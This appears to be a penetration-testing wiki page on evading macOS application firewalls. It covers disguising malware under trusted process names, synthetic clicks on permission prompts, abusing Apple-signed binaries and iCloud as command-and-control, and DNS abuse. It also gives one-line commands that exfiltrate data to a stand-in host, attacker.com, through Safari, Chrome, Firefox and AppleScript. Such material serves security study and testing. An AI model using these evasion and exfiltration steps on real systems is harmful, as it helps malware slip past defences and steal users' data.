# macOS Bypassing Firewalls
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## Found techniques
The following techniques were found working in some macOS firewall apps.
### Abusing whitelist names
* For example calling the malware with names of well known macOS processes like **`launchd`**
### Synthetic Click
* If the firewall ask for permission to the user make the malware **click on allow**
### **Use Apple signed binaries**
* Like **`curl`**, but also others like **`whois`**
### Well known apple domains
The firewall could be allowing connections to well known apple domains such as **`apple.com`** or **`icloud.com`**. And iCloud could be used as a C2.
### Generic Bypass
Some ideas to try to bypass firewalls
### Check allowed traffic
Knowing the allowed traffic will help you identify potentially whitelisted domains or which applications are allowed to access them
```bash
lsof -i TCP -sTCP:ESTABLISHED
```
### Abusing DNS
DNS resolutions are done via **`mdnsreponder`** signed application which will probably vi allowed to contact DNS servers.
### Via Browser apps
* **oascript**
```applescript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
```
* Google Chrome
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```bash
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
```
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* Firefox
```bash
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
```
* Safari
```bash
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
```
### Via processes injections
If you can **inject code into a process** that is allowed to connect to any server you could bypass the firewall protections:
{% content-ref url="macos-proces-abuse/" %}
[macos-proces-abuse](macos-proces-abuse/)
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## References
* [https://www.youtube.com/watch?v=UlT5KFTMn2k](https://www.youtube.com/watch?v=UlT5KFTMn2k)
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